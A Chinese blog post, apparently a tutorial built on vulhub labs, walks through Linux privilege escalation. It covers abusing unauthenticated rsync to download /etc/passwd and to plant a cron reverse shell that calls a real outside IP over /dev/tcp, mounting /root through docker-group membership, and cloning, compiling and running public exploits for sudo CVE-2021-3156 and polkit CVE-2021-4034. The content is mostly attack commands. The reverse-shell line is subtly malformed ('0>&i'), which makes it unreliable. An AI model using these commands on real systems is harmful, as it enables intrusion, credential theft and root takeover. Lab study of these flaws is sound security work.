0
点赞
收藏
分享

微信扫一扫

Linux提权:Docker组挂载 && Rsync未授权 && Sudo-CVE && Polkit-CVE

晴儿成长记 2024-01-29 阅读 12

目录

Rsync未授权访问

docker组挂载

Sudo-CVE漏洞

Polkit-CVE漏洞


Rsync未授权访问

Rsync是linux下一款数据备份工具,默认开启873端口
https://vulhub.org/#/environments/rsync/common/
借助Linux默认计划任务调用/etc/cron.hourly,利用rsync连接覆盖
前提:没有账号密码验证 开放873端口

探针

rsync rsync://ip:873/

出现下面这种情况就说明存在未授权

思路一:下载获取对方的敏感文件

 到达对方的根目录

可以通过rsync下载敏感文件 /etc/passwd 到自己根目录 

rsync rsync://ip:873/src/etc/passwd ./

思路二:覆盖定时文件,定时反弹shell

Linux系统的定时任务一般在 /etc/crontab

可以本地构造一个反弹 shell 的定时任务 nc

/bin/bash -i >& /dev/tcp/47.94.236.117/3333 0>&i

赋予执行权限

chmod +x nc

上传文件覆盖定时任务目录下

rsync -av nc rsync://ip:873/src/etc/cron.hourly

下载文件

rsync -av rsync://47.94.236.117:873/src/etc/passwd ./

本地监听反弹 shell 即可

nc -lvnp 3333

docker组挂载

漏洞复现:

常见一个普通用户,并放到docker组内

useradd -d /home/test -m  test
passwd test
usermod -G docker test
newgrp docker

利用

发现对方主机上存在docker服务,敲docker相关命令,判断有么docker相关的服务

groups 用户名 查看当前用户是否在docker组内

从Docker上下载alpine镜像,使用参数 -it 进入 容器shell

docker run -v /root:/mnt -it alpine

这样就可以实现非root用户访问敏感文件,在尝试进行提权

Sudo-CVE漏洞

漏洞探针:这是版本漏洞,在版本区间都会受到影响

sudo: 1.8.2 - 1.8.31   p2
sudo: 1.9.0 - 1.9.5     p1

执行命令,看是否报错

sudoedit -s /

若不报错,提示sudio的usage信息;报错:

利用:下载EXP直接攻击

// 下载EXP

git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156

// 编译一下
make

// 给执行权限
chmod a+x sudo-hax-me-a-sandwich

// 执行脚本 1是选择模式
./sudo-hax-me-a-sandwich 1

Polkit-CVE漏洞

漏洞影响2009年5月至今的所有polkit版本
由于polkit是系统预装工具,所有存在polkit的linux系统均受影响
如:CentOS、Ubuntu、Debian、Redhat、Fedora、Gentoo、Mageia等

探针  

dpkg -l policykit-1

存在漏洞:

不存在漏洞

git clone https://github.com/berdav/CVE-2021-4034.git
cd CVE-2021-4034/
make
./cve-2021-4034
举报

相关推荐

0 条评论